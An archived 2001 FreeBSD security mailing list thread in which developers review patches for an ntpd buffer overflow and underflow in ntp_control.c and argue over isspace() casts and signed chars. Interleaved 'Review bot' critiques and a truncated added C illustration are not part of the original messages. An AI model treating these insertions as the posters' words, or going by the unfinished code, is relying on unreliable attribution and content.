From: "Andrey A. Chernov" To: Matt Dillon Cc: Mark.Andrews@nominum.com, Chris Byrnes , security@FreeBSD.ORG Subject: Re: ntpd patch Message-ID: <20010406035459.A6350@nagual.pp.ru> References: <200104052314.f35NE6T54121@drugs.dv.isc.org> <200104052328.f35NSN232886@earth.backplane.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200104052328.f35NSN232886@earth.backplane.com>; from dillon@earth.backplane.com on Thu, Apr 05, 2001 at 04:28:23PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Apr 05, 2001 at 16:28:23 -0700, Matt Dillon wrote: > Off-by-1 fix + > buffer underflow http://apollo.backplane.com/FreeBSD/ntpd-patch2.diff > For this one please change + while (tp != buf && isspace((int)(*(tp-1)))) to + while (tp != buf && isspace((unsigned char)(*(tp-1)))) (int) cast is completely wrong and dangerous. -- Andrey A. Chernov http://ache.pp.ru/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 16:56:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from drugs.dv.isc.org (drugs.dv.isc.org [130.155.191.236]) by hub.freebsd.org (Postfix) with ESMTP id 042D637B496 for ; Thu, 5 Apr 2001 16:56:51 -0700 (PDT) (envelope-from marka@nominum.com) Received: from nominum.com (localhost.dv.isc.org [127.0.0.1]) by drugs.dv.isc.org (8.11.2/8.11.2) with ESMTP id f35NuMT54272; Fri, 6 Apr 2001 09:56:23 +1000 (EST) (envelope-from marka@nominum.com) Message-Id: <200104052356.f35NuMT54272@drugs.dv.isc.org> To: Matt Dillon Cc: Chris Byrnes , security@FreeBSD.ORG 
From: Mark.Andrews@nominum.com Subject: Re: ntpd patch In-reply-to: Your message of "Thu, 05 Apr 2001 16:28:23 MST." <200104052328.f35NSN232886@earth.backplane.com> Date: Fri, 06 Apr 2001 09:56:22 +1000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Poul's patch: http://apollo.backplane.com/FreeBSD/ntpd-patch1.diff > > Off-by-1 fix + > buffer underflow http://apollo.backplane.com/FreeBSD/ntpd-patch2.diff > > (second patch from Mark Andrews and others?) > > -Matt > I've reimplemented the Off-by-1 fix ">=" vs "- 1". Fixed isspace() calling. Index: ntp_control.c =================================================================== RCS file: /home/ncvs/src/contrib/ntp/ntpd/ntp_control.c,v retrieving revision 1.1.1.2.2.1 diff -u -r1.1.1.2.2.1 ntp_control.c --- ntp_control.c 2001/04/04 23:09:10 1.1.1.2.2.1 +++ ntp_control.c 2001/04/05 23:53:13 @@ -1615,7 +1615,8 @@ /* * Delete leading commas and white space */ - while (reqpt < reqend && (*reqpt == ',' || isspace((int)*reqpt))) { + while (reqpt < reqend && (*reqpt == ',' || + isspace((unsigned char)*reqpt))) { reqpt++; } @@ -1639,7 +1640,8 @@ tp++; } if ((*tp == '\0') || (*tp == '=')) { - while (cp < reqend && isspace((int)*cp)) + while (cp < reqend && + isspace((unsigned char)*cp)) cp++; if (cp == reqend || *cp == ',') { buf[0] = '\0'; 
@@ -1652,26 +1654,19 @@ if (*cp == '=') { cp++; tp = buf; - while (cp < reqend && isspace((int)*cp)) + while (cp < reqend && + isspace((unsigned char)*cp)) cp++; while (cp < reqend && *cp != ',') { *tp++ = *cp++; - if (tp > buf + sizeof(buf)) { - msyslog(LOG_WARNING, "Attempted \"ntpdx\" exploit from IP %d.%d.%d.%d:%d (possibly spoofed)\n", - (ntohl(rmt_addr->sin_addr.s_addr) >> 24) & 0xff, - (ntohl(rmt_addr->sin_addr.s_addr) >> 16) & 0xff, - (ntohl(rmt_addr->sin_addr.s_addr) >> 8) & 0xff, - (ntohl(rmt_addr->sin_addr.s_addr) >> 0) & 0xff, - ntohs(rmt_addr->sin_port) -); - + if (tp >= buf + sizeof(buf)) return (0); - } } if (cp < reqend) cp++; *tp = '\0'; - while (isspace((int)(*(tp-1)))) + while (tp != buf && + isspace((unsigned char)(*(tp-1)))) *(--tp) = '\0'; reqpt = cp; *data = buf; -- Mark Andrews, Nominum Inc. 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: Mark.Andrews@nominum.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 16:59:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from awww.jeah.net (awww.jeah.net [216.111.239.130]) by hub.freebsd.org (Postfix) with ESMTP id 88DEE37B440 for ; Thu, 5 Apr 2001 16:59:08 -0700 (PDT) (envelope-from chris@jeah.net) Received: from localhost (chris@localhost) by awww.jeah.net (8.11.3/8.11.0) with ESMTP id f35NxED02777; Thu, 5 Apr 2001 18:59:15 -0500 (CDT) (envelope-from chris@jeah.net) Date: Thu, 5 Apr 2001 18:59:12 -0500 (CDT) 
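Review bot: in the @@ -1652,26 +1654,19 @@ hunk of the ntp_control.c patch above, the oversized-value branch becomes a bare return (0) and the msyslog() call is removed with nothing in its place, so a request that trips the bound leaves no record on the host. If the removal is deliberate, for example to keep a flood of such requests from filling the log, a comment saying so plus a rate-limited message or a counter would keep the signal for operators. The isspace() casts in this hunk and the two before it are now (unsigned char), which is the right argument type.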
From: Chris Byrnes To: Cc: Matt Dillon , Subject: Re: ntpd patch In-Reply-To: <200104052356.f35NuMT54272@drugs.dv.isc.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Can you put it on the web somewhere, or attach it to an email, as everytime I get a patch from the list it fails when I try to patch? + Chris Byrnes, chris@JEAH.net + JEAH Communications + 1-866-AWW-JEAH (Toll-Free) On Fri, 6 Apr 2001 Mark.Andrews@nominum.com wrote: > > > Poul's patch: http://apollo.backplane.com/FreeBSD/ntpd-patch1.diff > > > > Off-by-1 fix + > > buffer underflow http://apollo.backplane.com/FreeBSD/ntpd-patch2.diff > > > > (second patch from Mark Andrews and others?) > > > > -Matt > > > > I've reimplemented the Off-by-1 fix ">=" vs "- 1". > Fixed isspace() calling. > > Index: ntp_control.c > =================================================================== > RCS file: /home/ncvs/src/contrib/ntp/ntpd/ntp_control.c,v > retrieving revision 1.1.1.2.2.1 > diff -u -r1.1.1.2.2.1 ntp_control.c > --- ntp_control.c 2001/04/04 23:09:10 1.1.1.2.2.1 > +++ ntp_control.c 2001/04/05 23:53:13 > @@ -1615,7 +1615,8 @@ > /* > * Delete leading commas and white space > */ > - while (reqpt < reqend && (*reqpt == ',' || isspace((int)*reqpt))) { > + while (reqpt < reqend && (*reqpt == ',' || > + isspace((unsigned char)*reqpt))) { > reqpt++; > } > > @@ -1639,7 +1640,8 @@ > tp++; > } > if ((*tp == '\0') || (*tp == '=')) { > - while (cp < reqend && isspace((int)*cp)) > + while (cp < reqend && > + isspace((unsigned char)*cp)) > cp++; > if (cp == reqend || *cp == ',') { > buf[0] = '\0'; 
> @@ -1652,26 +1654,19 @@ > if (*cp == '=') { > cp++; > tp = buf; > - while (cp < reqend && isspace((int)*cp)) > + while (cp < reqend && > + isspace((unsigned char)*cp)) > cp++; > while (cp < reqend && *cp != ',') { > *tp++ = *cp++; > - if (tp > buf + sizeof(buf)) { > - msyslog(LOG_WARNING, "Attempted \"ntpdx\" exploit from IP %d.%d.%d.%d:%d (possibly spoofed)\n", > - (ntohl(rmt_addr->sin_addr.s_addr) >> 24) & 0xff, > - (ntohl(rmt_addr->sin_addr.s_addr) >> 16) & 0xff, > - (ntohl(rmt_addr->sin_addr.s_addr) >> 8) & 0xff, > - (ntohl(rmt_addr->sin_addr.s_addr) >> 0) & 0xff, > - ntohs(rmt_addr->sin_port) > -); > - > + if (tp >= buf + sizeof(buf)) > return (0); > - } > } > if (cp < reqend) > cp++; > *tp = '\0'; > - while (isspace((int)(*(tp-1)))) > + while (tp != buf && > + isspace((unsigned char)(*(tp-1)))) > *(--tp) = '\0'; > reqpt = cp; > *data = buf; > -- > Mark Andrews, Nominum Inc. > 1 Seymour St., Dundas Valley, NSW 2117, Australia > PHONE: +61 2 9871 4742 INTERNET: Mark.Andrews@nominum.com > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 17: 9:55 2001 Delivered-To: freebsd-security@freebsd.org Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id A673E37B423 for ; Thu, 5 Apr 2001 17:09:52 -0700 (PDT) (envelope-from dillon@earth.backplane.com) Received: (from dillon@localhost) by earth.backplane.com (8.11.2/8.9.3) id f3609lW34732; Thu, 5 Apr 2001 17:09:47 -0700 (PDT) (envelope-from dillon) Date: Thu, 5 Apr 2001 17:09:47 -0700 (PDT) 
From: Matt Dillon Message-Id: <200104060009.f3609lW34732@earth.backplane.com> To: Mark.Andrews@nominum.com Cc: Chris Byrnes , security@FreeBSD.ORG Subject: Re: ntpd patch References: <200104052356.f35NuMT54272@drugs.dv.isc.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org : : :> Poul's patch: http://apollo.backplane.com/FreeBSD/ntpd-patch1.diff :> :> Off-by-1 fix + :> buffer underflow http://apollo.backplane.com/FreeBSD/ntpd-patch2.diff :> :> (second patch from Mark Andrews and others?) :> :> -Matt :> : : I've reimplemented the Off-by-1 fix ">=" vs "- 1". : Fixed isspace() calling. I'll add the unsigned char stuff to the patches on my site. You can duke it out with Poul in regards to the buffer overload / syslog stuff. My new patch page is on: http://apollo.backplane.com/FreeBSD/ntpd.html -Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 17:33:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from Awfulhak.org (awfulhak.demon.co.uk [194.222.196.252]) by hub.freebsd.org (Postfix) with ESMTP id F3C3D37B422 for ; Thu, 5 Apr 2001 17:33:53 -0700 (PDT) (envelope-from brian@Awfulhak.org) Received: from hak.lan.Awfulhak.org (root@hak.lan.Awfulhak.org [172.16.0.12]) by Awfulhak.org (8.11.3/8.11.3) with ESMTP id f360XkU13167; Fri, 6 Apr 2001 01:33:46 +0100 (BST) (envelope-from brian@lan.Awfulhak.org) Received: from hak.lan.Awfulhak.org (brian@localhost [127.0.0.1]) by hak.lan.Awfulhak.org (8.11.3/8.11.3) with ESMTP id f360XfP03505; Fri, 6 Apr 2001 01:33:41 +0100 (BST) (envelope-from brian@hak.lan.Awfulhak.org) Message-Id: <200104060033.f360XfP03505@hak.lan.Awfulhak.org> X-Mailer: exmh version 2.3.1 01/18/2001 with nmh-1.0.4 To: "Andrey A. Chernov" Cc: Matt Dillon , Mark.Andrews@nominum.com, Chris Byrnes , security@FreeBSD.ORG, brian@Awfulhak.org Subject: Re: ntpd patch In-Reply-To: Message from "Andrey A. 
Chernov" of "Fri, 06 Apr 2001 03:54:59 +0400." <20010406035459.A6350@nagual.pp.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 06 Apr 2001 01:33:41 +0100 From: Brian Somers Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > On Thu, Apr 05, 2001 at 16:28:23 -0700, Matt Dillon wrote: > > Off-by-1 fix + > > buffer underflow http://apollo.backplane.com/FreeBSD/ntpd-patch2.diff > > > > For this one please change > > + while (tp != buf && isspace((int)(*(tp-1)))) > > to > > + while (tp != buf && isspace((unsigned char)(*(tp-1)))) > > (int) cast is completely wrong and dangerous. $ man isspace ..... SYNOPSIS #include int isspace(int c) ..... I believe the int is correct. > -- > Andrey A. Chernov > http://ache.pp.ru/ -- Brian Don't _EVER_ lose your sense of humour ! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 17:38: 9 2001 Delivered-To: freebsd-security@freebsd.org Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id 347F337B507 for ; Thu, 5 Apr 2001 17:37:58 -0700 (PDT) (envelope-from cdf.lists@fxp.org) Received: by peitho.fxp.org (Postfix, from userid 1501) id 98BAF13615; Thu, 5 Apr 2001 20:38:14 -0400 (EDT) Date: Thu, 5 Apr 2001 20:38:14 -0400 
From: Chris Faulhaber To: Mark.Andrews@nominum.com Cc: Matt Dillon , security@FreeBSD.ORG Subject: Re: ntpd patch Message-ID: <20010405203814.B91568@peitho.fxp.org> References: <200104052328.f35NSN232886@earth.backplane.com> <200104052356.f35NuMT54272@drugs.dv.isc.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="kXdP64Ggrk/fb43R" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200104052356.f35NuMT54272@drugs.dv.isc.org>; from Mark.Andrews@nominum.com on Fri, Apr 06, 2001 at 09:56:22AM +1000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --kXdP64Ggrk/fb43R Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Fri, Apr 06, 2001 at 09:56:22AM +1000, Mark.Andrews@nominum.com wrote: >=20 > > Poul's patch: http://apollo.backplane.com/FreeBSD/ntpd-patch1.diff > >=20 > > Off-by-1 fix + > > buffer underflow http://apollo.backplane.com/FreeBSD/ntpd-patch2.diff > >=20 > > (second patch from Mark Andrews and others?) > >=20 > > -Matt > >=20 >=20 > I've reimplemented the Off-by-1 fix ">=3D" vs "- 1". > Fixed isspace() calling. >=20 alternatively, fix the off-by-one and underflow in one line (obtained from NetBSD): Index: ntp_control.c =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D RCS file: /home/ncvs/src/contrib/ntp/ntpd/ntp_control.c,v retrieving revision 1.2 diff -u -r1.2 ntp_control.c --- ntp_control.c 2001/04/04 23:07:22 1.2 +++ ntp_control.c 2001/04/05 21:42:48 
@@ -1656,17 +1656,8 @@ cp++; while (cp < reqend && *cp !=3D ',') { *tp++ =3D *cp++; - if (tp > buf + sizeof(buf)) { - msyslog(LOG_WARNING, "Attempted \"ntpdx\" exploit from IP %d.%d.%d= .%d:%d (possibly spoofed)\n",=20 - (ntohl(rmt_addr->sin_addr.s_addr) >> 24) & 0xff, - (ntohl(rmt_addr->sin_addr.s_addr) >> 16) & 0xff, - (ntohl(rmt_addr->sin_addr.s_addr) >> 8) & 0xff, - (ntohl(rmt_addr->sin_addr.s_addr) >> 0) & 0xff, - ntohs(rmt_addr->sin_port) -); - + if (tp >=3D buf + sizeof(buf) - 1) return (0); - } } if (cp < reqend) cp++; --=20 Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org --kXdP64Ggrk/fb43R Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: FreeBSD: The Power To Serve iEYEARECAAYFAjrND/YACgkQObaG4P6BelDDGACgpDLBm0zwjg9afKKJITxNyCh1 GUMAn0Ic64pH9PxXIz2QSMae6BF/XlRm =kkDS -----END PGP SIGNATURE----- --kXdP64Ggrk/fb43R-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 17:38:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id AA41137B496 for ; Thu, 5 Apr 2001 17:38:25 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id UAA73318; Thu, 5 Apr 2001 20:38:02 -0400 (EDT) (envelope-from wollman) Date: Thu, 5 Apr 2001 20:38:02 -0400 (EDT) 
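Review bot: The message says this fixes the off-by-one and the underflow in one line, but the hunk (@@ -1656,17 +1656,8 @@) only changes the bound test and ends at "if (cp < reqend) cp++;", so the trailing-space loop "while (isspace((int)(*(tp-1))))" shown in the other patch in this thread is not touched here and can still read buf[-1] when the value is empty. It needs the "tp != buf" guard as well. Also, because the test runs after the store, "tp >= buf + sizeof(buf) - 1" rejects a value of sizeof(buf) - 1 characters that would fit together with its terminator; ">= buf + sizeof(buf)" is sufficient. The msyslog() warning is removed here too without being mentioned.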
From: Garrett Wollman
Message-Id: <200104060038.UAA73318@khavrinen.lcs.mit.edu>
To: Brian Somers
Cc: security@FreeBSD.ORG
Subject: Re: ntpd patch
In-Reply-To: <200104060033.f360XfP03505@hak.lan.Awfulhak.org>
References: <20010406035459.A6350@nagual.pp.ru> <200104060033.f360XfP03505@hak.lan.Awfulhak.org>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

< said:

> I believe the int is correct.

You are mistaken. The purpose of the cast is to defeat the automatic
promotion from `char' to `int', which causes sign-extension if `char'
is signed. Casting to `unsigned char' prevents this from happening.

-GAWollman

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Apr 5 17:49:37 2001
Delivered-To: freebsd-security@freebsd.org
Received: from Awfulhak.org (awfulhak.demon.co.uk [194.222.196.252]) by hub.freebsd.org (Postfix) with ESMTP id 7685237B424 for ; Thu, 5 Apr 2001 17:49:29 -0700 (PDT) (envelope-from brian@Awfulhak.org)
Received: from hak.lan.Awfulhak.org (root@hak.lan.Awfulhak.org [172.16.0.12]) by Awfulhak.org (8.11.3/8.11.3) with ESMTP id f360nZU13246; Fri, 6 Apr 2001 01:49:35 +0100 (BST) (envelope-from brian@lan.Awfulhak.org)
Received: from hak.lan.Awfulhak.org (brian@localhost [127.0.0.1]) by hak.lan.Awfulhak.org (8.11.3/8.11.3) with ESMTP id f360nVP03735; Fri, 6 Apr 2001 01:49:31 +0100 (BST) (envelope-from brian@hak.lan.Awfulhak.org)
Message-Id: <200104060049.f360nVP03735@hak.lan.Awfulhak.org>
X-Mailer: exmh version 2.3.1 01/18/2001 with nmh-1.0.4
To: Garrett Wollman
Cc: Brian Somers , security@FreeBSD.ORG, brian@Awfulhak.org
Subject: Re: ntpd patch
In-Reply-To: Message from Garrett Wollman of "Thu, 05 Apr 2001 20:38:02 EDT." <200104060038.UAA73318@khavrinen.lcs.mit.edu>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Fri, 06 Apr 2001 01:49:31 +0100
From: Brian Somers Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > < said: > > > I believe the int is correct. > > You are mistaken. The purpose of the cast is to defeat the automatic > promotion from `char' to `int', which causes sign-extension if `char' > is signed. Casting to `unsigned char' prevents this from happening. Oops, yes... I guess I'll go to bed now then :*I > -GAWollman -- Brian Don't _EVER_ lose your sense of humour ! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 17:55: 8 2001 Delivered-To: freebsd-security@freebsd.org Received: from nagual.pp.ru (pobrecita.freebsd.ru [194.87.13.42]) by hub.freebsd.org (Postfix) with ESMTP id 788D937B43E for ; Thu, 5 Apr 2001 17:55:05 -0700 (PDT) (envelope-from ache@nagual.pp.ru) Received: (from ache@localhost) by nagual.pp.ru (8.11.3/8.11.3) id f360sHv07065; Fri, 6 Apr 2001 04:54:17 +0400 (MSD) (envelope-from ache) Date: Fri, 6 Apr 2001 04:54:16 +0400 
From: "Andrey A. Chernov" To: Brian Somers Cc: Matt Dillon , Mark.Andrews@nominum.com, Chris Byrnes , security@FreeBSD.ORG Subject: Re: ntpd patch Message-ID: <20010406045416.B6984@nagual.pp.ru> References: <200104060033.f360XfP03505@hak.lan.Awfulhak.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200104060033.f360XfP03505@hak.lan.Awfulhak.org>; from brian@Awfulhak.org on Fri, Apr 06, 2001 at 01:33:41AM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Apr 06, 2001 at 01:33:41 +0100, Brian Somers wrote: > $ man isspace > ..... > SYNOPSIS > #include > > int > isspace(int c) > ..... > > I believe the int is correct. No! Please read _whole_ manpage, not just prototype. -- Andrey A. Chernov http://ache.pp.ru/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 17:56:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id 69BF237B424 for ; Thu, 5 Apr 2001 17:56:47 -0700 (PDT) (envelope-from dillon@earth.backplane.com) Received: (from dillon@localhost) by earth.backplane.com (8.11.2/8.9.3) id f360uCN35967; Thu, 5 Apr 2001 17:56:12 -0700 (PDT) (envelope-from dillon) Date: Thu, 5 Apr 2001 17:56:12 -0700 (PDT) 
From: Matt Dillon
Message-Id: <200104060056.f360uCN35967@earth.backplane.com>
To: Brian Somers
Cc: "Andrey A. Chernov" , Mark.Andrews@nominum.com, Chris Byrnes , security@FreeBSD.ORG, brian@Awfulhak.org
Subject: Re: ntpd patch
References: <200104060033.f360XfP03505@hak.lan.Awfulhak.org>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

The issue here is that 'tp' is a 'char' type, which may be signed by
default (e.g. on IA32 it is signed). If you pass a signed char to a
ctype macro/function taking an int, any character >= 0x80 will be turned
into a negative number when it is expanded to an integer.

The cast to unsigned char simply ensures that when the character is
expanded to an integer in the procedure call, it is not converted
into a negative number.

Now, I don't think FreeBSD cares about this at all. However, many
older systems do care and it is just plain common sense to not pass
a negative number to a ctype macro when you don't need to. The last
time I had to port a piece of software to a Solaris box (I don't
remember what version it was running), with -Wall -Wstrict-prototypes,
the solaris box complained mightily about passing a char to a ctype
macro.

This is just common sense, really. How generic do we want the code
to be? It certainly doesn't hurt.

-Matt

:>
:> + while (tp != buf && isspace((unsigned char)(*(tp-1))))
:>
:> (int) cast is completely wrong and dangerous.
:
:$ man isspace
:.....
:SYNOPSIS
: #include
:
: int
: isspace(int c)
:.....
:
:I believe the int is correct.
:
:> --
:> Andrey A.
Chernov :> http://ache.pp.ru/ : :-- :Brian : To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 18: 3:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from nagual.pp.ru (pobrecita.freebsd.ru [194.87.13.42]) by hub.freebsd.org (Postfix) with ESMTP id BDE9D37B424 for ; Thu, 5 Apr 2001 18:03:25 -0700 (PDT) (envelope-from ache@nagual.pp.ru) Received: (from ache@localhost) by nagual.pp.ru (8.11.3/8.11.3) id f36133807225; Fri, 6 Apr 2001 05:03:04 +0400 (MSD) (envelope-from ache) Date: Fri, 6 Apr 2001 05:03:02 +0400 
From: "Andrey A. Chernov"
To: Matt Dillon
Cc: Brian Somers , Mark.Andrews@nominum.com, Chris Byrnes , security@FreeBSD.ORG
Subject: Re: ntpd patch
Message-ID: <20010406050302.C6984@nagual.pp.ru>
References: <200104060033.f360XfP03505@hak.lan.Awfulhak.org> <200104060056.f360uCN35967@earth.backplane.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <200104060056.f360uCN35967@earth.backplane.com>; from dillon@earth.backplane.com on Thu, Apr 05, 2001 at 05:56:12PM -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, Apr 05, 2001 at 17:56:12 -0700, Matt Dillon wrote:
>
> Now, I don't think FreeBSD cares about this at all. However, many

Yes, FreeBSD cares and is sensitive, since we have signed chars by default.

> This is just common sense, really. How generic do we want the code
> to be? It certainly doesn't hurt.

1) Negative ctype offsets can produce false hits/misses (if addressed memory
present) causing wrong interpretation of data.

2) Negative ctype offsets can produce off memory requests (addressed memory
not present) causing core dumps.

--
Andrey A.
Chernov http://ache.pp.ru/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 19:36: 4 2001 Delivered-To: freebsd-security@freebsd.org Received: from netau1.alcanet.com.au (ntp.alcanet.com.au [203.62.196.27]) by hub.freebsd.org (Postfix) with ESMTP id D11EE37B43E for ; Thu, 5 Apr 2001 19:35:58 -0700 (PDT) (envelope-from jeremyp@gsmx07.alcatel.com.au) Received: from mfg1.cim.alcatel.com.au (mfg1.cim.alcatel.com.au [139.188.23.1]) by netau1.alcanet.com.au (8.9.3 (PHNE_22672)/8.9.3) with ESMTP id MAA01530; Fri, 6 Apr 2001 12:34:52 +1000 (EST) Received: from gsmx07.alcatel.com.au by cim.alcatel.com.au (PMDF V5.2-32 #37640) with ESMTP id <01K22VL1RIOGRW0B54@cim.alcatel.com.au>; Fri, 6 Apr 2001 12:34:47 +1100 Received: (from jeremyp@localhost) by gsmx07.alcatel.com.au (8.11.1/8.11.1) id f362Yin80101; Fri, 06 Apr 2001 12:34:44 +1000 (EST envelope-from jeremyp) Content-return: prohibited Date: Fri, 06 Apr 2001 12:34:44 +1000 
From: Peter Jeremy
Subject: Re: ntpd patch
In-reply-to: <200104060056.f360uCN35967@earth.backplane.com>; from dillon@earth.backplane.com on Thu, Apr 05, 2001 at 05:56:12PM -0700
To: Matt Dillon
Cc: Brian Somers , security@FreeBSD.ORG
Mail-Followup-To: Matt Dillon , Brian Somers , security@FreeBSD.ORG
Message-id: <20010406123444.F66243@gsmx07.alcatel.com.au>
MIME-version: 1.0
Content-type: text/plain; charset=us-ascii
Content-disposition: inline
User-Agent: Mutt/1.2.5i
References: <200104060033.f360XfP03505@hak.lan.Awfulhak.org> <200104060056.f360uCN35967@earth.backplane.com>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On 2001-Apr-05 17:56:12 -0700, Matt Dillon wrote:
> The cast to unsigned char simply ensures that when the character is
> expanded to an integer in the procedure call, it is not converted
> into a negative number.
>
> Now, I don't think FreeBSD cares about this at all.

Having looked at the actual macro expansions a day or so ago...

If you pass a negative number to any of the isXXX() macros, you get a
result of 0. This means that it is safe to pass a char to isXXX(),
but the result may be incorrect for locales other than `c'.

The domain of isXXX() is restricted to values representable as
unsigned char and EOF - ie [-1..255] for most implementations.
Traditionally, isXXX() was commonly implemented as:

    extern some_int_type _ctype[257];
    #define isXXX(c) (_ctype[(c)+1] & _CTYPE_XXX)

which is undefined for values outside the allowable domain. FreeBSD
adds range checking and returns 0 instead of de-referencing random
memory in this case. FreeBSD also has some inline function wrappers
so that the "char used as a subscript" warning is masked (which is
probably unfortunate in this case).

> This is just common sense, really. How generic do we want the code
> to be? It certainly doesn't hurt.

In this case, there's no reason not to do it correctly - which means
using something like "isspace((unsigned char)(*(tp-1)))". (My
preference would be "isspace((unsigned char)tp[-1])", but that is
just cosmetic).

Peter

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Apr 5 23:59:35 2001
Delivered-To: freebsd-security@freebsd.org
Received: from homer.softweyr.com (bsdconspiracy.net [208.187.122.220]) by hub.freebsd.org (Postfix) with ESMTP id B215C37B446 for ; Thu, 5 Apr 2001 23:59:28 -0700 (PDT) (envelope-from wes@softweyr.com)
Received: from [127.0.0.1] (helo=softweyr.com ident=f0398585d9e4c4b629560f1981ddfb83) by homer.softweyr.com with esmtp (Exim 3.16 #1) id 14lQBu-0000Ii-00; Fri, 06 Apr 2001 00:57:54 -0600
Message-ID: <3ACD68F2.E0604EF1@softweyr.com>
Date: Fri, 06 Apr 2001 00:57:54 -0600
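The three things argued over in the ntpd patch thread above (the bound test that runs after the store, the "tp != buf" guard on the trim loop, and the (unsigned char) cast) can be compared side by side in a small model. This is an added example, not ntpd code and not written by any poster; the 8-byte buffer, the guard bytes, the function names and the sample values are constructed, and `signed char` stands in for a platform where plain `char` is signed.

```c
/* Added illustration: a bounded model, not ntpd source. Sizes, names and
 * sample values are constructed. */
#include <ctype.h>
#include <limits.h>
#include <stdio.h>
#include <string.h>

#define LOGICAL 8  /* stands in for sizeof(buf) */
#define GUARD   4  /* slack on each side so stray accesses stay inside store[] */

enum bound { ORIGINAL_GT, PATCH_GE, PATCH_GE_MINUS_1 };

struct result {
    int    accepted;   /* 0: the bound test fired and the parser returned 0 */
    size_t len;        /* value length after the trailing-space trim */
    size_t overflow;   /* bytes written at or past buf[LOGICAL] */
    size_t underflow;  /* bytes written before buf[0] by the trim loop */
};

/* isXXX() is defined only for EOF and values representable as unsigned char. */
int in_ctype_domain(int c) { return c == EOF || (c >= 0 && c <= UCHAR_MAX); }

/* What isspace() is handed for one byte where plain char is signed. */
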